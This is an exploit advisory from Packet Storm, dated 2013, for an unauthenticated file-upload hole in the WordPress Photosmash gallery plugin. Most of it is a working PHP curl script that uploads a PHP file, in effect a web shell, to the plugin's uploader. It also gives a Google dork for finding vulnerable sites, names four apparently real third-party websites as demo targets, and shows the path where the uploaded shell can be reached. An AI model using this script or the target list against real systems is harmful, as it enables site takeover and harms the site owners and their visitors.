WordPress Photosmash Shell Upload

2013-12-08T00:00:00
ID PACKETSTORM:124342
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-12-08T00:00:00

Description

                                        
                                            `###############################################################  
# Exploit Title: Wordpress photosmash plugins Remote File Upload  
Vulnerability  
# Author: Ashiyane Digital Security Team  
# Date: 12/08/2013  
# Vendor Homepage: http://smashly.net/  
# Software Link :  
http://downloads.wordpress.org/plugin/photosmash-galleries.1.0.7.zip  
# Google dork: inurl:/wp-content/plugins/photosmash-galleries/  
# Tested on: Windows/Linux  
###############################################################  
  
# Exploit :  
= = = = = =  
  
<?php  
$uploadfile="file.php";  
$ch = curl_init("  
http://127.0.0.1/wordpress/wp-content/plugins/photosmash-galleries/bwbps-uploader.php  
");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('FileData'=>"@$uploadfile"));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
?>  
  
2) Exploit demo :  
= = = = = = = = =  
http://ibcpalmer.org//wp-content/plugins/photosmash-galleries/bwbps-uploader.php  
http://knuckledraggerzvc.com/wp/wp-content/plugins/photosmash-galleries/bwbps-uploader.php  
http://www.doersmissions.org//wp-content/plugins/photosmash-galleries/bwbps-uploader.php  
http://www.hrbuoy.com/wp-content/plugins/photosmash-galleries/bwbps-uploader.php  
# #### #### #### #### #### #### #### #### #  
  
# http://[Target]/wp-content/uploads/bwbps/file.php  
  
# #### #### #### #### #### #### #### #### #  
# BY T3rm!nat0r5  
# E-mail : poya.terminator@gmail.com  
# #### #### #### #### #### #### #### #### #  
`